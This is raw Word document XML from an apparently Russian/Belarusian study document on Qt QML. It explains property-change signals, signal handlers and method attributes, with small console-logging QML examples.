    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc483603882"/>
      <w:bookmarkStart w:id="32" w:name="_Toc483605102"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Встроенные</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> property-change signals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1"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QML types also provide built-in</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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property change signals</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that are emitted whenever a property value changes, as previously described in the section on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor="property-attributes" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property attributes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc483000524"/>
      <w:bookmarkStart w:id="34" w:name="_Toc483603883"/>
      <w:bookmarkStart w:id="35" w:name="_Toc483605103"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signal Handler Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Signal handlers are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a special sort of</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:anchor="method-attributes" w:history="1">
        <w:r w:rsidRPr="00CF5106">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>method attribute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the method implementation is invoked by the QML engine whenever the associated signal is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>emitted. Adding a signal to an object definition in QML will automatically add an associated signal handler to the object definition, which has, by default, an empty implementation. Clients can provide an implementation, to implement program logic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Кліент сам можа пісаць апрацавальнік сігнала для аб’екта пры яго дэклараванні.</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// SquareButton.qml</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Rectangle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id: root</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signal activated(real xPosition, real yPosition)</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signal deactivated</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property</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> side: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>100</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side; height: side</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MouseArea</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anchors.fill: parent</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onPressed: root.activated(mouse.x, mouse.y)</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onReleased: root.deactivated()</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FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00FC22F1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="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These signals could be received by any </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SquareButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> objects in another QML file in the same directory, where implementations for the signal handlers are provided by the client:</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// myapplication.qml</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SquareButton</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onActivated: console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Activated at "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + xPosition + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>","</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + yPosition)</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onDeactivated: console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Deactivated!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</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FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc483000525"/>
      <w:bookmarkStart w:id="37" w:name="_Toc483603884"/>
      <w:bookmarkStart w:id="38" w:name="_Toc483605104"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Change Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00FC22F1">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Signal handlers for property change signal take the syntax form</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Property&gt;Changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the name of the property, with the first letter capitalized.</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QtQuick</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55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.0</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TextInput</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text: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Change this!"</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onTextChanged: console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Text has changed to:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00FC22F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FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc483000526"/>
      <w:bookmarkStart w:id="40" w:name="_Toc483603885"/>
      <w:bookmarkStart w:id="41" w:name="_Toc483605105"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Method Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00FC22F1">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A method of an object type is a function which may be called to perform some processing or trigger further events. A method </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be connected to a signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that it is automatically invoked whenever the signal is emitted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00FC22F1">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method may be defined for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a type in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by tagging a function of a class which is then registered with the QML type system with</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="Q_INVOKABLE" w:history="1">
        <w:r w:rsidRPr="00CF5106">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_INVOKABLE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or by registering it as a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:anchor="Q_SLOT" w:history="1">
        <w:r w:rsidRPr="00CF5106">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_SLOT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of the class. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alternatively</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>custom method</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be added to an object declaration in a QML document with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
